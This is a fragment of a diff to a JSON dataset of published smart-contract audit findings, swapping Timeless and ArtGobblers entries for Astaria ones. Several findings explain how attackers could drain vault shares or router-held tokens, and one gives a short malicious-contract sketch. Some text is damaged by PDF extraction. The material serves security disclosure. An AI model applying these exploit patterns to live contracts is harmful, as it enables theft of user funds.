over the limit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a lien is bought out, _buyoutLien calls _getMaxPotentialDebtForCollateral to confirm that this number is lower than the maxPotentialDebt specified in the lien. However, this function is called with the existing stack, which hasn't yet replaced the lien with the new, bought out lien. Valid refinances can make the rate lower or the time longer. In the case that a lien was bought out for a longer duration, maxPotentialDebt will increase and could go over the limit specified in the lien.", "labels": [ "Spearbit", - "Timeless", - "Severity: High Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Swapper left-over token balances can be stolen", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The Swapper contract may never have any left-over token balances after performing a swap because token balances can be stolen by anyone in several ways: By using Swapper.doZeroExSwap with useSwapperBalance and tokenOut = tokenToSteal Arbitrary token approvals to arbitrary spenders can be set on behalf of the Swapper contract using UniswapV3Swapper.swapUnderlyingToXpyt.", + "title": "Liens cannot be bought out once we've reached the maximum number of active liens on one collateral", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The buyoutLien function is intended to transfer ownership of a lien from one user to another. In practice, it creates a new lien by calling _createLien and then calls _replaceStackAtPositionWithNewLien to update the stack. In the _createLien function, there is a check to ensure we don't take out more than maxLiens against one piece of collateral: if (params.stack.length >= s.maxLiens) { revert InvalidState(InvalidStates.MAX_LIENS); } The result is that, when we already have maxLiens and we try to buy one out, this function will revert.", "labels": [ "Spearbit", - "Timeless", - "Severity: High Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "TickMath might revert in solidity version 0.8", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "UniswapV3s TickMath library was changed to allow compilations for solidity version 0.8. However, adjustments to account for the implicit overow behavior that the contract relies upon were not performed. The In UniswapV3xPYT.sol is compiled with version 0.8 and indirectly uses this library through the OracleLibrary. the worst case, it could be that the library always reverts (instead of overowing as in previous versions), leading to a broken xPYT contract. The same pragma solidity >=0.5.0; instead of pragma solidity >=0.5.0 <0.8.0; adjustments have been made for the OracleLibrary and PoolAddress contracts. However, their code does not rely on implicit overow behavior.", + "title": "First vault deposit can cause excessive rounding", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Aside from storage layout/getters, the context above notes the other major departure from Solmate's ERC4626 implementation. The modification requires the initial mint to cost 10 full WETH. 37 + + + function mint( uint256 shares, address receiver ) public virtual returns (uint256 assets) { // assets is 10e18, or 10 WETH, whenever totalSupply() == 0 assets = previewMint(shares); // No need to check for rounding error, previewMint rounds up. // Need to transfer before minting or ERC777s could reenter. // minter transfers 10 WETH to the vault ERC20(asset()).safeTransferFrom(msg.sender, address(this), assets); // shares received are based on user input _mint(receiver, shares); emit Deposit(msg.sender, receiver, assets, shares); afterDeposit(assets, shares); } Astaria highlighted that the code diff from Solmate is in relation to this finding from the previous Sherlock audit. However, deposit is still unchanged and the initial deposit may be 1 wei worth of WETH, in return for 1 wad worth of vault shares. Further, the previously cited issue may still surface by calling mint in a way that sets the price per share high (e.g. 10 shares for 10 WETH produces a price per of 1:1e18). Albeit, at a higher cost to the minter to set the initial price that high.", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Medium Risk" ] - }, - { - "title": "Rounding issues when exiting a vault through shares", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "When exiting a vault through Gate.exitToVaultShares the user species a vaultSharesAmount. The amount of PYT&NYT to burn is determined by a burnAmount = _vaultSharesAmountToUnderlying- this function in derived YearnGate and ERC4626 Amount(vaultSharesAmount) call. All contracts round down the burnAmount. This means one needs to burn fewer amounts than the value of the received vault shares. implementations of This attack can be protable and lead to all vault shares being stolen If the gas costs of this attack are low. This can be the case with vault & underlying tokens with a low number of decimals, highly valuable shares, or cheap gas costs. Consider the following scenario: 7 Imagine the following vault assets: totalAssets = 1.9M, supply = 1M. Therefore, 1 share is theoretically worth 1.9 underlying. Call enterWithUnderlying(underlyingAmount = 1900) to mint 1900 PYT/NYT (and the gate receives 1900 * supply / totalAssets = 1000 vault shares). Call exitToVaultShares(vaultSharesAmount = 1), then burnAmount = shares.mulDivDown(totalAssets(), supply) = 1 * totalAssets / supply = 1. This burns 1 \"underlying\" (actually PYT/NYT but they are 1-to-1), but receive 1 vault share (worth 1.9 underlying). Repeat this for up to the minted 1900 PYT/NYT. Can redeem the 1900 vault shares for 3610 underlying directly at the vault, making a prot of 3610 - 1900 = 1710 underlying.", + }, + { + "title": "When the collateral is listed on SeaPort by the borrower using listForSaleOnSeaport, when settled the liquidation fee will be sent to address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When the collateral s.auctionData[collateralId].liquidator (s.auctionData in general) will not be set and so it will be address(0) and thus the liquidatorPayment will be sent to address(0).", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "Possible outstanding allowances from Gate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The vault parameter of Gate.enterWithUnderlying can be chosen by an attacker in such a way that underlying = vault.asset() is another vault token of the Gate itself. The subsequent _depositInto- Vault(underlying, underlyingAmount, vault) call will approve underlyingAmount of underlying tokens to the provided vault and could in theory allow stealing from other vault shares. This is currently only exploitable in very rare cases because the caller also has to transfer the underlyingAmount to the gate contract rst. For example, when transferring underlyingAmount = type(uint256).max is possible due to ashloans/ashmints and the vault shares implement approvals in a way that do not decrease anymore if the allowance is type(uint256).max, as is the case with ERC4626 vaults.", + "title": "potentialDebt is not compared against a new lien's maxPotentialDebt in _appendStack", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _appendStack, we have the following block: newStack = new Stack[](stack.length + 1); newStack[stack.length] = newSlot; uint256 potentialDebt = _getOwed(newSlot, newSlot.point.end); ... if ( stack.length > 0 && potentialDebt > newSlot.lien.details.maxPotentialDebt ) { revert InvalidState(InvalidStates.DEBT_LIMIT); } Note, we are only performing a comparison between newSlot.lien.details.maxPotentialDebt and poten- tialDebt when stack.length > 0. If _createLien is called with params.stack.length == 0, we would not perform this check and thus the input params is not fully checked for misconfiguration.", "labels": [ "Spearbit", - "Timeless", - "Severity: Low Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Factory.sol owner can change fees unexpectedly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The Factory.sol owner may be able to front run yield calculations in a gate implementation and change user fees unexpectedly.", + "title": "Previous withdraw proxy's withdrawReserveReceived is not updated when assets are drained from the current withdraw proxy to the previous", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When drain is called, we don't update the s.epochData[s.currentEpoch - 1]'s withdrawRe- serveReceived, this is in contrast to when withdraw reserves are transferred from the public vault to the withdraw proxy. This would unlink the previous withdraw proxy's withdrawReserveReceived storage parameter to the total amount of assets it has received from either the public vault or the current withdraw proxy. An actor can manipulate Bn(cid:0)1 (cid:0) Wn(cid:0)1's value by sending assets to the public vault and the current withdraw proxy before calling transferWithdrawReserve ( Bn(cid:0)1 is the previous withdraw proxy's asset balance, Wn(cid:0)1 is previous withdraw proxy's withdrawReserveReceived and n is public vault's epoch). Bn(cid:0)1 (cid:0) Wn(cid:0)1 should really represent the sum of all near-boundary auction payment's the previous withdraw proxy receives plus any assets that are transferred to it by an external actor. Related Issue 46.", "labels": [ "Spearbit", - "Timeless", - "Severity: Low Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Low uniswapV3TwapSecondsAgo may result in AMM manipulation in pound()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The lower the value of uniswapV3TwapSecondsAgo is set with at construction creation time the easier It becomes easier for attackers to it becomes for an attacker to manipulate the results of the pound() function. manipulate automated market maker price feeds with a lower time horizon, requiring less capital to manipulate prices, although users may simply not use an xPYT contract that sets uniswapV3TwapSecondsAgo too low.", + "title": "Update solc version and use unchecked in Uniswap related libraries", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The highlighted libraries above are referenced from Uniswap codebase which is intended to work with Solidity compiler <0.8. These older versions have unchecked arithmetic by default and the code takes it into account. Astaria code is intended to work with Solidity compiler >=0.8 which doesn't have unchecked arithmetic by default. Hence, to port the code, it has to be turned on via unchecked keyword. For example, FullMathUniswap.mulDiv(type(uint).max, type(uint).max, type(uint).max) reverts for v0.8, and returns type(uint).max for older version.", "labels": [ "Spearbit", - "Timeless", - "Severity: Low Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "UniswapV3Swapper uses wrong allowance check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Before the UniswapV3Swapper can exit a gate, it needs to set an XPYT allowance to the gate. The following check determines if an approval needs to be set: if ( args.xPYT.allowance(address(this), address(args.gate)) < tokenAmountOut ) { args.xPYT.safeApprove(address(args.gate), type(uint256).max); } args.gate.exitToUnderlying( args.recipient, args.vault, args.xPYT, tokenAmountOut ); The tokenAmountOut is in an underlying token amount but A legitimate gate.exitToUnderlying address(swapper)) checks allowance[swapper][gate] >= previewWithdraw(tokenAmountOut). is compared against an xPYT shares amount. xPYT.withdraw(tokenAmountOut, address(gate), call will call", + "title": "buyoutLien is prone to race conditions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "LienToken.buyoutLien and VaultImplementation.buyoutLien are both prone to race conditions where multiple vaults can try to front-run each others' buyoutLien call to end up registering their own lien. Also note, due to the storage values s.minInterestBPS and s.minDurationIncrease being used in the is- ValidRefinance, the winning buyoutLien call does not necessarily have to have the best rate or duration among the other candidates in the race.", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Missing check that tokenIn and tokenOut are different", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The doZeroExSwap() function takes in two ERC20 addresses which are tokenIn and tokenOut. The problem is that the doZeroExSwap() function does not check if the two token addresses are different from one another. Adding this check can reduce possible attack vectors.", + "title": "ERC20-Cloned allows certain actions for address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In ERC20-Cloned, address(0) can be used as the: spender (spender) to parameter of transferFrom. to parameter of transfer. to parameter of _mint. from parameter of _burn. As an example, one can transfer or transferFrom to address(0) which would turn the amount of tokens unus- able but those not update the total supply in contrast to if _burn was called.", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Gate.sol gives unlimitted ERC20 approval on pyt for arbitrary address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "A malicious contract may be passed into the claimYieldAndEnter() function as xPYT and given full control over any PYT the contract may ever hold. Even though PYT is validated to be a real PYT contract and the Gate.sol contract isnt expected to have any PYT in it, it would be safer to remove any unnecessary approvals.", + "title": "BEACON_PROXY_IMPLEMENTATION and WETH cannot be updated for AstariaRouter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There is no update mechanism for BEACON_PROXY_IMPLEMENTATION and WETH in AstariaRouter. It would make sense that one would want to keep WETH as not upgradable (unless we provide the wrong address to the constructor). But for BEACON_PROXY_IMPLEMENTATION there could be possibilities of potentially upgrading it.", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Constructor function does not check for zero address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The constructor function does not check if the addresses passed in are zero addresses. This check can guard against errors during deployment of the contract.", + "title": "Incorrect key parameter type is used for s.epochData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In PublicVault, whenever the epoch key provided is to the mapping s.epochData its type is uint64, but the type of s.epochData is mapping(uint256 => EpochData)", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Accruing yield to msg.sender is not required when minting to xPYT contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The _exit function always accrues yield to the msg.sender before burning new tokens. The idea is to accrue yield for the recipient rst before increasing/reducing their balance to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are burned on the Gate and not msg.sender.", + "title": "buyoutLien, canLiquidate and makePayment have different notion of expired liens when considering edge cases", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When swapping a lien that is just expired (lien's end tend equals to the current timestamp tnow ), one can call buyoutLien to swap it out. But when tnow > tend , buyoutLien reverts due to the underflow in _- getRemainingInterest when calculating the buyout amount. This is in contrast to canLiquidate which allows a lien with tnow = tend to liquidate as well. makePayment also only considers tend < tnow as expired liens. So the expired/non-functional liens time ranges for different endpoints are: endpoint expired range buyoutLien canLiquidate makePayment (tend , 1) [tend , 1) (tend , 1)", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Unlocked solidity pragmas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Most of the implementation code uses a solidity pragma of 0.8.4. contracts that use different functions. Unlocked solidity pragmas can result in unexpected behaviors or errors with different compiler versions.", + "title": "Ensure all ratios are less than 1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Although, numerators and denominators for different fees are set by admin, it's a good practice to add a check in the contract for absurd values. In this case, that would be when numerator is greater than denominator.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "No safeCast in UniswapV3Swappers _swap.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "It should be noted that solidity version 0.8.0 doesnt revert on overow when type-casting. For example, if you tried casting the value 129 from uint8 to int8, it would overow to -127 instead. This is because signed integers have a lower positive integer range compared to unsigned integers i.e -128 to 127 for int8 versus 0 to 255 for uint8.", + "title": "Factor out s.slope updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Slope updates occur in multiple locations but do not emit events.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "One step critical address change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Setting the owner in Ownable is a one-step transaction. This situation enables the scenario of contract functionality becoming inaccessible or making it so a malicious address that was accidentally set as owner could compromise the system.", + "title": "External call to arbitrary address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The Router has a convenience function to commit to multiple liens AstariaRouter.commitToLiens. This function causes the router to receive WETH and allows the caller to supply an arbitrary vault address lien- Request.strategy.vault which is called by the router. This allows the potential for the caller to re-enter in the middle of the loop, and also allows them to drain any WETH that happens to be in the Router. In our review, no immediate reason for the Router to have WETH outside of commitToLiens calls was identified and therefore the severity of this finding is low.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Missing zero address checks in transfer and transferFrom functions.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The codebase uses solmates ERC-20 implementation. It should be noted that this library sacrices user safety for gas optimization. As a result, their ERC-20 implementation doesnt include zero address checks on transfer and transferFrom functions.", + "title": "Astaria's Seaport orders may not be listed on OpenSea", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "To list Seaport orders on OpenSea, the order should pass certain validations as described here(see OpenSea Order Validation). Currently, Astaria orders will fail this validation. For instance, zone and zoneHash values are not set as suggested.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Should add indexed keyword to deployed xPYT event", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The DeployXPYT event only has the ERC20 asset_ marked as indexed while xPYT deployed can also have the indexed key word since you can use up to three per event and it will make it easier for bots to interact off chain with the protocol.", + "title": "Any ERC20 held in the Router can be stolen using ERC4626RouterBase functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "All four functions in ERC4626RouterBase.sol take in a vault address, a to address, a shares amount, and a maxAmountIn for validation. The first step is to read vault.asset() and then approve the vault to spend the ERC20 at whatever address is returned for the given amount. function mint( IERC4626 vault, address to, uint256 shares, uint256 maxAmountIn ) public payable virtual override returns (uint256 amountIn) { ERC20(vault.asset()).safeApprove(address(vault), shares); if ((amountIn = vault.mint(shares, to)) > maxAmountIn) { revert MaxAmountError(); } } In the event that the Router holds any ERC20, a malicious user can design a contract with the following functions: function asset() view pure returns (address) { return [ERC20 the router holds]; } function mint(uint shares, address to) view pure returns (uint) { return 0; } If this contract is passed as the vault, the function will pass, and the router will approve this contract to control its holdings of the given ERC20.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Missing check that tokenAmountIn is larger than zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "In doZeroExSwap() there is no check that the tokenAmountIn number is larger than zero. Adding this check can add more thorough validation within the function.", + "title": "Inconsistency in byte size of maxInterestRate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In RouterStorage, maxInterestRate has a size of uint88. However, when being set from file(), it is capped at uint48 by the safeCastTo48() function.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "ERC20 does not emit Approval event in transferFrom", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The ERC20 contract does not emit new Approval events with the updated allowance in transferFrom. This makes it impossible to track approvals solely by looking at Approval events.", + "title": "Router#file has update for nonexistent MinInterestRate variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "One of the options in the file() function is to update FileType.MinInterestRate. There are two problems here: 1) If someone chooses this FileType, the update actually happens to s.maxInterestRate. 2) There is no minInterestRate storage variable, as minInterestBPS is handled on L235-236.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Use the ofcial UniswapV3 0.8 branch", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The current repositories create local copies of UniswapV3s codebase and manually migrate the contracts to Solidity 0.8. For FullMath.sol this also leads to some small gas optimizations in this LOC as it uses 0 instead of type(uint256).max + 1.", + "title": "getLiquidationWithdrawRatio() and getYIntercept() have incorrect return types", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "liquidationWithdrawRatio and yIntercept like other amount-related parameters are of type uint88 (uint88) and they are the returned values of getLiquidationWithdrawRatio() and getYIntercept() re- spectively. But the return type of getLiquidationWithdrawRatio() and getYIntercept() are defined as uint256.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "No checks that provided xPYT matches PYT of the provided vault", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The Gate contracts has many functions that allow specifying vault and a xPYT addresses as pa- rameter. The underlying of the xPYT address is assumed to be the same as the vaults PYT but this check is not enforced. Users that call the Gate functions with an xPYT contract for the wrong vault could see their de- posit/withdrawals lost.", + "title": "The modified implementation of redeem is omitting a check to make sure not to redeem 0 assets.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The modified implementation of redeem is omitting the check // Check for rounding error since we round down in previewRedeem. require((assets = previewRedeem(shares)) != 0, \"ZERO_ASSETS\"); You can see a trail of it in redeemFutureEpoch.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Protocol does not work with non-standard ERC20 tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Some ERC20 tokens make modications to their ERC20s transfer or balanceOf functions. One kind include deationary tokens that charge certain fee for every transfer or transferFrom. Others are rebasing tokens that increase in balance over time. Using these tokens in the protocol can lead to issues such as: Entering a vault through the Gate will not work as it tries to deposit the pre-fee amount instead of the received post-fee amount. The UniswapV3Swapper tries to enter a vault with the pre-fee transfer amount.", + "title": "PublicVault's redeem and redeemFutureEpoch always returns 0 assets.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "assets returned by redeem and redeemFutureEpoch will always be 0, since it has not been set in redeemFutureEpoch. Also Withdraw event emits an incorrect value for asset because of this. The issue stems from trying to consolidate some of the logic for redeem and withdraw by using redeemFutureEpoch for both of them.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "The claimGobbler function does not enforce the MINTLIST_SUPPLY on-chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "There is a public constant MINTLIST_SUPPLY (2000) that is supposed to represent the number of gobblers that can be minted by using merkle proofs. However, this is not explicitly enforced in the claimGobbler function and will need to be verified off-chain from the list of merkle proof data. The risk lies in the possibility of having more than 2000 proofs.", + "title": "OWNER() cannot be updated for private or public vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "owner() is an immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVault- Base. That means for example if there is an issue with the current hardcoded owner() there is no way to update it and liquidities/assets in the public/private vaults would also be at risk.", "labels": [ "Spearbit", - "ArtGobblers", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Feeding a gobbler to itself may lead to an infinite loop in the off-chain renderer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The contract allows feeding a gobbler to itself and while we do not think such action causes any issues on the contract side, it will nevertheless cause potential problems with the off-chain rendering for the gob- blers. The project explicitly allows feeding gobblers to other gobblers. In such cases, if the off-chain renderer is designed to render the inner gobbler, it would cause an infinite loop for the self-feeding case. Additionally, when a gobbler is fed to another gobbler the user will still own one of the gobblers. However, this is not the case with self-feeding,.", + "title": "ROUTER() can not be updated for private or public vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "ROUTER() is an immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVault- Base. That means for example if there is an issue with the current hardcoded ROUTER() or that it needs to be upgraded, the current public/private vaults would not be able to communicate with the new ROUTER.", "labels": [ "Spearbit", - "ArtGobblers", + "Astaria", "Severity: Low Risk" ] }, { - "title": "The function toString() does not manage memory properly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "There are two issues with the toString() function: 1. It does not manage the memory of the returned string correctly. In short, there can be overlaps between memory allocated for the returned string and the current free memory. 2. It assumes that the free memory is clean, i.e., does not explicitly zero out used memory. Proof of concept for case 1: function testToStringOverwrite() public { string memory str = LibString.toString(1); uint freememptr; uint len; bytes32 data; uint raw_str_ptr; assembly { // Imagine a high level allocation writing something to the current free memory. // Should have sufficient higher order bits for this to be visible mstore(mload(0x40), not(0)) freememptr := mload(0x40) // Correctly allocate 32 more bytes, to avoid more interference mstore(0x40, add(mload(0x40), 32)) raw_str_ptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint(\"memptr: \", freememptr); emit log_named_uint(\"str: \", raw_str_ptr); emit log_named_uint(\"len: \", len); emit log_named_bytes32(\"data: \", data); } Logs: memptr: : 256 str: : 205 len: : 1 data: : 0x31000000000000000000000000000000000000ffffffffffffffffffffffffff The key issue here is that the function allocates and manages memory region [205, 269) for the return variable. However, the free memory pointer is set to 256. The memory between [256, 269) can refer to both the string and another dynamic type that's allocated later on. Proof of concept for case 2: 5 function testToStringDirty() public { uint freememptr; // Make the next 4 bytes of the free memory dirty assembly { let dirty := not(0) freememptr := mload(0x40) mstore(freememptr, dirty) mstore(add(freememptr, 32), dirty) mstore(add(freememptr, 64), dirty) mstore(add(freememptr, 96), dirty) mstore(add(freememptr, 128), dirty) } string memory str = LibString.toString(1); uint len; bytes32 data; assembly { freememptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint(\"str: \", freememptr); emit log_named_uint(\"len: \", len); emit log_named_bytes32(\"data: \", data); assembly { freememptr := mload(0x40) } emit log_named_uint(\"memptr: \", freememptr); } Logs: str: 205 len: : 1 data: : 0x31ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff memptr: : 256 In both cases, high level solidity will not have issues decoding values as this region in memory is meant to be empty. However, certain ABI decoders, notably Etherscan, will have trouble decoding them. Note: It is likely that the use of toString() in ArtGobblers will not be impacted by the above issues. However, these issues can become severe if LibString is used as a generic string library.", + "title": "Wrong return parameter type is used for getOwed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Both variations of getOwed use _getOwed and return uint192. But _getOwed returns a uint88.", "labels": [ "Spearbit", - "ArtGobblers", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Consider migrating all require statements to Custom Errors for gas optimization, better UX, DX and code consistency", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "There is a mixed usage of both require and Custom Errors to handle cases where the transaction must revert. We suggest replacing all require instances with Custom Errors in order to save gas and improve user / developer experience. The following is a list of contract functions that still use require statements: ArtGobblers mintLegendaryGobbler ArtGobblers safeBatchTransferFrom ArtGobblers safeTransferFrom SignedWadMath wadLn GobblersERC1155B balanceOfBatch GobblersERC1155B _mint GobblersERC1155B _batchMint PagesERC721 ownerOf PagesERC721 balanceOf PagesERC721 approve PagesERC721 transferFrom PagesERC721 safeTransferFrom PagesERC721 safeTransferFrom (overloaded version)", + "title": "Document and reason about which functionalities should be frozen on protocol pause", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "On protocol pause, a few functions are allowed to be called. Some instances are noted above. There is no documentation on why these functionalities are allowed while the remaining functions are frozen.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Gas Optimization" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Minting of Gobbler and Pages can be further gas optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "Currently, in order to mint a new Page or Gobbler users must have enough $GOO in their Goo contract balance. If the user does not have enough $GOO he/she must call ArtGobblers.removeGoo(amount) to remove the required amount from the Gobbler's balance and mint new $GOO. That $GOO will be successively burned to mint the Page or Gobbler. In the vast majority of cases users will never have $GOO in the Goo contract but will have their $GOO directly stacked inside their Gobblers to compound and maximize the outcome. Given these premises, it makes sense to implement a function that does not require users to make two distinct transactions to perform: mint $GOO (via removeGoo). burn $GOO + mint the Page/Gobbler (via mintFromGoo). 7 but rather use a single transaction that consumes the $GOO stacked on the Gobbler itself without ever minting and burning any $GOO from the Goo contract. By doing so, the user will perform the mint operation with only one transaction and the gas cost will be much lower because it does not require any interaction with the Goo contract.", + "title": "Wrong parameter type is used for s.strategyValidators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "s.strategyValidators is of type mapping(uint32 => address) but the provided TYPE in the con- text is of type uint8.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Gas Optimization" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Declare GobblerReserve artGobblers as immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The artGobblers in the GobblerReserve can be declared as immutable to save gas. - ArtGobblers public artGobblers; + ArtGobblers public immutable artGobblers;", + "title": "Some functions do not emit events, but they should", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "AstariaRouter.sol#L268 : Other filing endpoints in the same contract and also CollateralToken and LienToken emit FileUpdated(what, data). But fileGuardian does not.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Gas Optimization" + "Astaria", + "Severity: Low Risk" ] }, { - 